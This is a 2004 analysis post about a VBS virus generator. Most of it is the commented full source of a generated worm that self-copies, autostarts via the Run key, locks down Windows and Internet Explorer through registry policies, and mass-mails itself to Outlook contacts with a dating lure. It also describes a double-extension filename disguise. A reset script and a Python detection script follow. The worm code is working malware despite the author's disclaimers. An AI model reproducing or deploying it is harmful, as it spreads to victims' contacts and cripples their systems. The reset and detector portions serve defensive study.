Analysis Report: VBS Virus Generator v1.0
Posted: 2004/10/8 16:41:00  Source: compiled by this site  Author: 蓝点
Warning: this article is a technical analysis only. Please do not misuse it; I accept no responsibility whatsoever for any consequences. Keep that in mind.
A virus generator: this is a typical one that is popular online (virus generator: as the name says, a machine for making viruses (^_^ stating the obvious)), used for point-and-click hand-crafting of VBS viruses (VBS virus: VBS is Visual Basic Script, i.e. VB scripting, a language-independent script interpretation mechanism for the 32-bit Windows platform provided by Microsoft's Windows Script Host, which lets scripts run directly from the Windows desktop or the command prompt. Through WSH a script can manipulate WSH objects, ActiveX objects, the registry and the file system. Powerful, isn't it? Scared yet?!).
The program was probably written in VB (I did not ask the author for details) and imports three system DLLs: kernel32.dll, user32.dll and advapi32.dll. kernel32.dll handles system control, including process creation, variable setting, virtual memory management and system resource management, and is one of the libraries the operating system cannot do without. user32.dll handles communication with the user, including message passing and echo. advapi32.dll provides the program's interface to the system API, here a number of registry operations: RegOpenKey (obtain a handle to a subkey), RegCloseKey (close an opened or created subkey) and RegQueryValueEx (read the value of a specified key).
Below is the source code of the *.vbs script virus (every major antivirus product reports it as vbs.xxxxx) obtained by running the generator with every feature option selected, i.e. with the payload at its most vicious: every destructive function enabled, the most harmful configuration possible. I have added some comments of my own. (Rename it to something like xxxx.txt .vbs, with N spaces between the first and second extension; quite deceptive, isn't it? Everyone should watch out for this trick from now on (it counts as a kind of social engineering ^_^). It could then be spread by e-mail or other means to do its damage, but you must never do that, haha! Don't be a villain! Be a good person!)
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject") ' Create a FileSystemObject, which gives the script access to the file system (the registry writes below go through the Wscript.Shell object)
Set dir1=fs.GetSpecialFolder(0) ' Get the Windows/WinNT folder
Set dir2=fs.GetSpecialFolder(1) ' Get the System32/System folder
Set so=CreateObject("Scripting.FileSystemObject")
dim r ' Declare a variable
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs") ' Copy the virus into the Windows/WinNT folder
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") ' Copy the virus into the System32/System folder
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs") ' Copy the virus into the Start Menu Startup folder
' Below: malicious registry changes and simple propagation via Outlook
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" ' Registry change: disable the "Run" menu item
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" ' Registry change: disable the "Shut Down" menu item
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" ' Registry change: hide all drive letters
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" ' Registry change: disable the registry editing tools
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","" ' Registry change: disable the registry scan at startup
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD" ' Registry change: disable the "Log Off" menu item
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD" ' Registry change: disable MS-DOS real mode
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" ' Registry change: make this script run automatically at startup
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD" ' Registry change: hide the desktop icons
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD" ' Registry change: disable pure DOS mode
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" ' Registry change: disable the "Taskbar and Start Menu" settings
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" ' Registry change: disable the right-click context menu
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" ' Registry change: disable the Control Panel
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" ' Registry change: stop .reg files from being imported by re-associating them with the txt file type
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","警告" ' Set the title of the logon notice box ("Warning")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","您中vbs脚本病毒了,哭吧~" ' Set the text of the logon notice box ("You've been hit by a VBS script virus, go cry~")
Set ol=CreateObject("Outlook.Application") ' Create an Outlook Application object for propagation
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) ' Send this VBS virus to the first 100 entries in the address book; a simple, dumb worm, you could say~~
Mail.Subject="今晚你来吗?" ' Mail subject ("Are you coming tonight?")
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" ' Mail body (a warm invitation from "your friend Rose", details in the attachment, signed by a local dating site)
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
' Below: malicious changes to the Internet Explorer options
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" ' Registry change: disable the right-click menu in the browser
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" ' Registry change: disable Internet Options
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD" ' Registry change: disable "Save As"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" ' Registry change: disable the "File/Open" menu
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD" ' Registry change: lock the Advanced tab settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD" ' Registry change: lock the temporary files settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD" ' Registry change: lock automatic configuration
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" ' Registry change: lock the home page setting (the "Home page" box is greyed out)
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD" ' Registry change: lock the history settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD" ' Registry change: lock the Internet Connection Wizard
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" ' Registry change: lock the Security tab
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD" ' Registry change: disable "Reset Web Settings"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" ' Registry change: disable View Source
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD" ' Registry change: disable adding offline subscriptions
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD" ' Registry change: disable the "File" menu
Below is the "antidote" the author provides, the source code of the recovery file reset.vbs:
(since it is exactly the reverse of the malicious changes above, it is left mostly uncommented)
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
' Each RunOnce entry needs its own value name; writing the same name three times overwrites the earlier entries and only one copy would be deleted at the next boot
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree1","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree2","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree3","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
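The behaviours the two scripts above show (policy lockdown writes, a Run-key autostart, copying ScriptFullName, an Outlook address-book loop, and the "xxxx.txt .vbs" double-extension trick) are easy to recognise statically. The following Python triage script is an added example, not code from the page or from the generator's author; the key list, regexes and the SAMPLE text are constructed here and are not an antivirus signature. It treats a value of 0 as a restore (as reset.vbs writes), so only lockdowns count.

```python
import re

# Constructed subset of the policy values the generated Win32system.vbs writes to lock the user out.
LOCKDOWN_KEYS = (
    r"Policies\Explorer\NoRun", r"Policies\Explorer\NoClose",
    r"Policies\Explorer\NoDrives", r"Policies\System\DisableRegistryTools",
    r"Policies\Explorer\NoDesktop", r"Policies\Explorer\NoSetFolders",
    r"Internet Explorer\Restrictions\NoBrowserOptions",
    r"Internet Explorer\Control Panel\HomePage",
)
REGWRITE = re.compile(r'\.Regwrite\s+"([^"]+)"\s*,\s*("[^"]*"|\d+)', re.I)
SELF_COPY = re.compile(r"ScriptFullName\)\.Copy\(", re.I)
MASS_MAIL = re.compile(r"Outlook\.Application|AddressLists\(\d+\)\.AddressEntries", re.I)
# "report.txt        .vbs": harmless-looking extension, a run of spaces, then a script extension
DISGUISED_NAME = re.compile(r"\.(txt|doc|jpg|gif)\s{2,}\.(vbs|vbe|js|jse|wsf)$", re.I)

def triage_vbs(text):
    """Extract the behaviour indicators the analysis above describes from VBScript source."""
    writes = REGWRITE.findall(text)
    low = [(k.lower(), v) for k, v in writes]
    # a value of 0 (as in reset.vbs) restores the policy, so only non-zero writes count as lockdown
    lockdown = [k for k, v in low if v != "0" and any(k.endswith(p.lower()) for p in LOCKDOWN_KEYS)]
    run_keys = [k for k, _ in low if "\\currentversion\\run\\" in k]
    return {
        "regwrites": len(writes),
        "lockdown_keys": lockdown,
        "run_keys": run_keys,
        "self_copy": bool(SELF_COPY.search(text)),
        "mass_mail": bool(MASS_MAIL.search(text)),
    }

def risk_score(report):
    """One point per behaviour class: lockdown, autorun persistence, self-copy, mass mail."""
    return sum([bool(report["lockdown_keys"]), bool(report["run_keys"]),
                report["self_copy"], report["mass_mail"]])

def is_disguised_name(filename):
    return bool(DISGUISED_NAME.search(filename))

# Constructed sample: a few lines in the shape of the generated script above.
SAMPLE = r'''On Error Resume Next
Set so=CreateObject("Scripting.FileSystemObject")
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
Set ol=CreateObject("Outlook.Application")
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
'''
```

Running triage_vbs(SAMPLE) reports 3 registry writes, 2 lockdown keys, 1 Run key, self-copy and mass-mail both true, for a risk_score of 4; the same NoRun key written with 0 scores 0.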
After the analysis above, don't you feel that VBS viruses are really simple? Indeed they are: that is all a VBS worm amounts to. The viruses this generator produces are strictly beginner level, yet their terrifying destructive capability is enough to make you break into a cold sweat: even the most skilled user, with the registry damaged this badly, would almost certainly have to reinstall the system (anyone who doesn't deserves respect for their patience ¥#¥). So this virus is simply too nasty and too brutal; there is very little technique in it and nothing novel. Its infectivity and stealth are also quite ordinary.
Finally, once again a serious statement: please do not do anything illegal, or the "white hats" may invite you in for tea.
Pure technical research is to be encouraged.
PS: corrections to any errors in the analysis above are welcome; thank you.